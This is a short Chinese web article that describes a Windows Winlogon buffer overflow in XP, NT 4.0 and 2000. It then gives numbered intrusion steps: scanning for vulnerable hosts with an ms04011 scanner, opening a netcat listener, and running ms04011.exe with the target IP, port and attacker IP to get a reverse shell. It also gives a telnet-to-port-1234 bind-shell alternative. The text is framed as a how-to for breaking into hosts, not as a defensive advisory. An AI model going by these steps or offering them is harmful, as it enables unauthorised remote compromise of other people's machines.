Microsoft Windows XP
Microsoft Windows NT 4.0
Microsoft Windows 2000
描述:
Microsoft Windows Winlogon存在进程一个缓冲区溢出,远程攻击者可以利用这个漏洞可能以进程权限执行任意指令。
由于Winlogon在登录过程中使用的数据值大小没有进行任何检查就插入到分配的缓冲区中,可导致发生缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
1 用ms04011漏洞扫描器扫出有漏洞的主机扫到有VULNERABLE字样的说明主机有漏洞的可能性非常大
2 扫到后用NC来监听 nc -l -p 监听端口 -----按回车 或 nc -vv -l -p 监听端口
3 方式 ms04011.exe 0 要入侵的IP 监听端口 自己IP
其中0 表示2000系统 NT5.0 1表示XP系统 NT5.1
或者----------------------------------------------
先ms04011.exe 0 要入侵的IP
然后直接 telnet 要入侵的IP 1234。
文章评论
共有 位脚本之家网友发表了评论我来说两句